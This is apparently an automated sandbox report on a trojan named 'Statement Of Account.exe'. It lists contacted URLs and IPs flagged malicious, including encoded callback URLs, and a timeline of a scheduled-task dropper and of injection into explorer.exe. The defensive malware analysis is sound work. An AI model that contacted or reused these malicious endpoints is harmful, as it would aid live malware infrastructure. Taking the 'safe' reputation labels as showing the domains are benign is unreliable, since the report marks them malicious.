https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | 0% | URL Reputation | safe
https://outlook.com_ | 0% | URL Reputation | safe
http://schemas.mi | 0% | URL Reputation | safe
https://powerpoint.office.comcember | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.airzf.comReferer: | 0% | Avira URL Cloud | safe
http://www.novistashop.com/gs12/www.nexelab.com | 0% | Avira URL Cloud | safe
http://www.b-a-s-e.netReferer: | 0% | Avira URL Cloud | safe
http://www.hjgd.xyz | 0% | Avira URL Cloud | safe
http://www.juniavilela.com/gs12/www.lolabeautystudios.com | 0% | Avira URL Cloud | safe
http://www.hjgd.xyz/gs12/www.bodution.website | 0% | Avira URL Cloud | safe
http://www.zdryueva.comReferer: | 0% | Avira URL Cloud | safe
http://www.b-a-s-e.net/gs12/ | 0% | Avira URL Cloud | safe
http://www.demandstudiosnews.com/gs12/www.heavydutywearpart.com | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | Avira URL Cloud | safe
http://www.baansbliss.comReferer: | 0% | Avira URL Cloud | safe
http://www.lolabeautystudios.com | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | Avira URL Cloud | safe
http://www.juniavilela.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.b-a-s-e.net | 0% | Avira URL Cloud | safe
http://www.baansbliss.com | 0% | Avira URL Cloud | safe
http://www.juniavilela.com | 0% | Avira URL Cloud | safe
http://www.airzf.com | 0% | Avira URL Cloud | safe
http://www.kustomequipment.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.zdryueva.com | 0% | Avira URL Cloud | safe
http://www.airzf.com/gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 | 0% | Avira URL Cloud | safe
http://www.udin88b.usReferer: | 0% | Avira URL Cloud | safe
http://www.lolabeautystudios.comReferer: | 0% | Avira URL Cloud | safe
http://www.lolabeautystudios.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.udin88b.us/gs12/ | 0% | Avira URL Cloud | safe
http://www.kustomequipment.com/gs12/www.novistashop.com | 0% | Avira URL Cloud | safe
http://www.baansbliss.com/gs12/www.otirugkyt.com | 0% | Avira URL Cloud | safe
http://www.demandstudiosnews.com | 0% | Avira URL Cloud | safe
http://www.otirugkyt.com | 0% | Avira URL Cloud | safe
http://www.hjgd.xyz/gs12/ | 0% | Avira URL Cloud | safe
http://www.airzf.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.bodution.website/gs12/www.juniavilela.com | 0% | Avira URL Cloud | safe
http://www.demandstudiosnews.comReferer: | 0% | Avira URL Cloud | safe
http://www.heavydutywearpart.com | 0% | Avira URL Cloud | safe
http://www.novistashop.comReferer: | 0% | Avira URL Cloud | safe
http://www.nexelab.com/gs12/www.udin88b.us | 0% | Avira URL Cloud | safe
http://www.bodution.websiteReferer: | 0% | Avira URL Cloud | safe
http://www.demandstudiosnews.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | Avira URL Cloud | safe
http://www.lolabeautystudios.com/gs12/www.kustomequipment.com | 0% | Avira URL Cloud | safe
http://www.heavydutywearpart.com/gs12/www.goldenvistaservices.com | 0% | Avira URL Cloud | safe
http://www.bodution.website/gs12/ | 0% | Avira URL Cloud | safe
http://www.novistashop.com | 0% | Avira URL Cloud | safe
http://www.juniavilela.comReferer: | 0% | Avira URL Cloud | safe
http://www.zdryueva.com/gs12/www.hjgd.xyz | 0% | Avira URL Cloud | safe
http://www.udin88b.us/gs12/www.baansbliss.com | 0% | Avira URL Cloud | safe
http://www.goldenvistaservices.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.goldenvistaservices.comReferer: | 0% | Avira URL Cloud | safe
http://www.b-a-s-e.net/gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 | 0% | Avira URL Cloud | safe
http://www.nexelab.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.airzf.com | 154.12.38.29 | true | true | - | unknown
www.b-a-s-e.net | 91.195.240.94 | true | true | - | unknown
www.bodution.website | 160.124.174.163 | true | true | - | unknown
td-ccm-neg-87-45.wixdns.net | 34.149.87.45 | true | true | - | unknown
www.zdryueva.com | unknown | unknown | true | - | unknown

Name | Malicious | Antivirus Detection | Reputation
http://www.airzf.com/gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 | true | Avira URL Cloud: safe | unknown
http://www.b-a-s-e.net/gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 | true | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://aka.ms/odirmr | explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.demandstudiosnews.com/gs12/www.heavydutywearpart.com | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.novistashop.com/gs12/www.nexelab.com | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hjgd.xyz | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.juniavilela.com/gs12/www.lolabeautystudios.com | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers | Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://excel.office.com | explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.b-a-s-e.net/gs12/ | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hjgd.xyz/gs12/www.bodution.website | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.airzf.comReferer: | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.b-a-s-e.netReferer: | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zdryueva.comReferer: | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.baansbliss.comReferer: | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lolabeautystudios.com | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.baansbliss.com | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.galapagosdesign.com/DPlease | Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000009.00000002.2951588982.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C893000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.urwpp.deDPlease | Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.juniavilela.com/gs12/ | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Statement Of Account.exe, 00000000.00000002.1703144585.0000000003150000.00000004.00000800.00020000.00000000.sdmp, SdYCcXyq.exe, 0000000B.00000002.1741610690.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.juniavilela.com | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zdryueva.com | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.airzf.com | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.b-a-s-e.net | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://wns.windows.com/L | explorer.exe, 00000009.00000002.2951588982.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C557000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.kustomequipment.com/gs12/ | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://word.office.com | explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.otirugkyt.com | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.lolabeautystudios.comReferer: | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://schemas.micr | explorer.exe, 00000009.00000002.2947771554.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.lolabeautystudios.com/gs12/ | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.udin88b.usReferer: | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.baansbliss.com/gs12/www.otirugkyt.com | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kustomequipment.com/gs12/www.novistashop.com | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.udin88b.us/gs12/ | explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - |
                                                              high
                                                              http://www.hjgd.xyz/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.airzf.com/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.demandstudiosnews.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.com_explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  low
                                                                  http://www.heavydutywearpart.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.novistashop.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.bodution.website/gs12/www.juniavilela.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.demandstudiosnews.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.demandstudiosnews.com/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.bodution.websiteReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designersGStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.miexplorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.nexelab.com/gs12/www.udin88b.usexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.fontbureau.com/designers/?Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.founder.com.cn/cn/bTheStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.lolabeautystudios.com/gs12/www.kustomequipment.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.fontbureau.com/designers?Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.heavydutywearpart.com/gs12/www.goldenvistaservices.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://powerpoint.office.comcemberexplorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.tiro.comStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.bodution.website/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.goodfont.co.krStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.juniavilela.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.novistashop.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.udin88b.us/gs12/www.baansbliss.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://schemas.microexplorer.exe, 00000009.00000002.2945097297.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2948147154.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1719884903.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.zdryueva.com/gs12/www.hjgd.xyzexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.goldenvistaservices.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.goldenvistaservices.com/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.typography.netDStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.galapagosdesign.com/staff/dennis.htmStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.nexelab.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://api.msn.com/qexplorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.fonts.comStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.94 | www.b-a-s-e.net | Germany | 47846 | SEDO-ASDE | true
154.12.38.29 | www.airzf.com | United States | 54133 | UNMETEREDCA | true
34.149.87.45 | td-ccm-neg-87-45.wixdns.net | United States | 2686 | ATGS-MMD-ASUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430501
Start date and time: 2024-04-23 18:42:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Statement Of Account.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@227/15@4/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 122
• Number of non-executed functions: 329
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: Statement Of Account.exe
Time | Type | Description
17:43:03 | Task Scheduler | Run new task: SdYCcXyq path: C:\Users\user\AppData\Roaming\SdYCcXyq.exe
18:42:59 | API Interceptor | 1x Sleep call for process: Statement Of Account.exe modified
18:43:01 | API Interceptor | 31x Sleep call for process: powershell.exe modified
18:43:03 | API Interceptor | 1x Sleep call for process: SdYCcXyq.exe modified
18:43:05 | API Interceptor | 1605484x Sleep call for process: explorer.exe modified
18:43:51 | API Interceptor | 1892540x Sleep call for process: cmstp.exe modified
